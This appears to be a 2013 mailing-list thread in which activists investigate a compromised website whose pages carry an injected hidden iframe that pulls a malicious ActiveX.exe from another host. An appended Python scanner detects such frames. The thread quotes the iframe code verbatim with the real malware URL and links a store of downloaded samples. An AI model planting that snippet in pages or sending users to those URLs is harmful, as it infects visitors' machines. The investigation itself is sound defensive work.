Hey,

On 29/01/2013 23:34, SiNA Rabbani wrote:
> This is the malware:
> https://www.virustotal.com/file/cfdd3a78a895b3f49a39402eb28b0d2134cc3086849a41a6fdfe7d829a0d4dcd/analysis/

Yes, saw that too. However, I don't find any precise description of its
behaviour. Like, what it does, if it opens any port, sends data to a C&C
or whatever.

I have downloaded it there:
https://resources.telecomix.ceops.eu/material/malwares/

All the best,

> --SiNA
>
> SiNA Rabbani:
>> holy shit:
>>
>> <iframe name="I1" width="10" height="10"
>> src="http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe"
>> border="0" frameborder="0">
>>
>> :/ if you are running windows don't even go there!!!
>>
>> Andrew Lewis:
>>> I can get to this in 6 hours or so, maybe someone is willing to
>>> jump on this before then?
>>>
>>> -Andrew
>>>
>>> On Jan 30, 2013, at 11:06 AM, KheOps <khe...@ceops.eu> wrote:
>>>
>>>> Dear Libtech,
>>>>
>>>> We just saw that the website : http://www.syrian-martyrs.com
>>>> is probably compromised. Every page of the website contains an
>>>> iFrame which links to a .exe file which is detected as a virus
>>>> by antivirus software:
>>>> http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe
>>>>
>>>> The fact that the HTML code is present at the bottom of each page makes
>>>> me think that the "index.php" page has been changed in a way
>>>> that makes that iFrame appear on every page of the website,
>>>> after the dynamic content.
>>>>
>>>> It also probably means that the attackers have some kind of
>>>> access to the server. My guess would be going to a PHP shell,
>>>> but I'm no expert in this.
>>>>
>>>> Any help, clue, investigation, would be very welcome :)
>>>>
>>>> Thank you,
>>>> KheOps
-- Unsubscribe, change to digest, or change password at: https://mailman.stanford.edu/mailman/listinfo/liberationtech
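The injected frame KheOps describes (a 10x10, borderless iframe appended after the page content, pointing at an .exe on another host) is easy to spot mechanically. Below is an added example, not code from anyone in this thread: a small scanner that parses a page's HTML and reports iframes that are off-site, point at an executable, or are tiny. The sample page and the host name malware-host.invalid are constructed for the demonstration; the function names are my own.

```python
# Added example: flag iframes matching the injection pattern from the thread
# (tiny frame, off-site src, executable src). The sample page is constructed
# and uses a placeholder host, not the real URL.
from html.parser import HTMLParser
from urllib.parse import urlparse

EXEC_SUFFIXES = (".exe", ".scr", ".msi", ".com", ".bat")

class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag in a document."""
    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({k: (v or "") for k, v in attrs})

def is_small(value, limit=50):
    """Missing or non-numeric sizes count as unknown, not small."""
    try:
        return int(value.rstrip("px")) <= limit
    except (ValueError, AttributeError):
        return False

def suspicious_iframes(html, site_host):
    """Return (src, reasons) for each iframe that is off-site, executable, or tiny."""
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        url = urlparse(src)
        reasons = []
        if url.hostname and url.hostname != site_host:
            reasons.append("off-site src")
        if url.path.lower().endswith(EXEC_SUFFIXES):
            reasons.append("executable src")
        if is_small(attrs.get("width")) and is_small(attrs.get("height")):
            reasons.append("tiny frame")
        if reasons:
            findings.append((src, reasons))
    return findings

# Constructed page: a legitimate embed, then a frame injected after the content.
SAMPLE_PAGE = """<html><body><p>Article text</p>
<iframe src="http://www.example.org/player" width="640" height="360"></iframe>
</body></html>
<iframe name="I1" width="10" height="10"
 src="http://malware-host.invalid/downloads/ActiveX.exe" border="0" frameborder="0">
"""
```

Run it against every page of the site (fetched from a machine you do not mind exposing, or from a copy of the web root) and any hit is a page to diff against a known-good version of index.php and the templates.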